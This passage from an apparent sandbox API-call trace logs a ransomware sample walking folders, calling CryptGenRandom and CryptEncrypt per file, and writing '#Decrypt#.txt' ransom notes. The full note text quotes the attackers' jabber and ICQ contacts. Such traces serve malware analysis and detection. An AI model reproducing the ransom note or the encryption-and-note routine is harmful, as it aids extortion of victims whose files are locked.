out: hHeap=0x780000) returned 1 [0234.258] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a593198, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x6a593198, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xf44c0670, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xa9c00, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ShapeCollector.exe", cAlternateFileName="")) returned 1 [0234.258] lstrcmpiW (lpString1="ShapeCollector.exe", lpString2="Windows") returned -1 [0234.258] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe") returned 73 [0234.258] StrStrIW (lpFirst="ShapeCollector.exe", lpSrch=".horseleader") returned 0x0 [0234.258] lstrcmpW (lpString1="ShapeCollector.exe", lpString2="#Decrypt#.txt") returned 1 [0234.258] lstrcmpW (lpString1="ShapeCollector.exe", lpString2="_uninstalling_.png") returned 1 [0234.258] lstrlenW (lpString=".testttjffg") returned 11 [0234.258] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe", lpSrch=".testttjffg") returned 0x0 [0234.259] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.259] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.259] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\shapecollector.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.260] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="sk-SK", cAlternateFileName="")) returned 1 [0234.260] lstrcmpiW (lpString1="sk-SK", lpString2="Windows") returned -1 [0234.260] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK") returned 60 [0234.260] lstrcmpW (lpString1="sk-SK", lpString2=".") returned 1 [0234.260] lstrcmpW (lpString1="sk-SK", lpString2="..") returned 1 [0234.260] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.260] GetProcessHeap () returned 0x780000 [0234.260] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0234.260] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\*") returned 62 [0234.260] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.261] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.261] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\.") returned 62 [0234.261] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.261] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.261] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.262] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\..") returned 63 [0234.262] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.262] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.262] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe526d67f, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe54f4dac, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe54f4dac, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.262] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.262] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\tipresx.dll.mui") returned 76 [0234.262] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.262] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.262] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.262] lstrlenW (lpString=".testttjffg") returned 11 [0234.262] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.262] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.263] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.263] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.263] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe526d67f, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe54f4dac, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe54f4dac, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.263] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.263] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\#Decrypt#.txt") returned 74 [0234.263] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.264] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0234.264] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.265] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0234.265] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.265] CloseHandle (hObject=0x158) returned 1 [0234.266] GetProcessHeap () returned 0x780000 [0234.266] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.266] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="sl-SI", cAlternateFileName="")) returned 1 [0234.266] lstrcmpiW (lpString1="sl-SI", lpString2="Windows") returned -1 [0234.266] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI") returned 60 [0234.266] lstrcmpW (lpString1="sl-SI", lpString2=".") returned 1 [0234.266] lstrcmpW (lpString1="sl-SI", lpString2="..") returned 1 [0234.266] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.267] GetProcessHeap () returned 0x780000 [0234.267] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0234.267] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\*") returned 62 [0234.267] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.267] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.267] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\.") returned 62 [0234.267] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.268] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.268] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.268] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\..") returned 63 [0234.268] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.268] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.268] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe92d84cc, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe94ed7e2, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe94ed7e2, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.268] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.268] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\tipresx.dll.mui") returned 76 [0234.268] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.268] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.268] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.268] lstrlenW (lpString=".testttjffg") returned 11 [0234.269] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.269] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.269] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.269] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.269] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe92d84cc, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe94ed7e2, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe94ed7e2, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.269] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.269] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\#Decrypt#.txt") returned 74 [0234.269] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.270] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0234.270] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.271] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0234.271] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.271] CloseHandle (hObject=0x158) returned 1 [0234.271] GetProcessHeap () returned 0x780000 [0234.271] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.271] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0234.271] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="Windows") returned -1 [0234.271] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS") returned 65 [0234.271] lstrcmpW (lpString1="sr-Latn-CS", lpString2=".") returned 1 [0234.271] lstrcmpW (lpString1="sr-Latn-CS", lpString2="..") returned 1 [0234.272] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.272] GetProcessHeap () returned 0x780000 [0234.272] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0234.272] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\*") returned 67 [0234.272] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.272] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.272] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\.") returned 67 [0234.272] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.272] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, 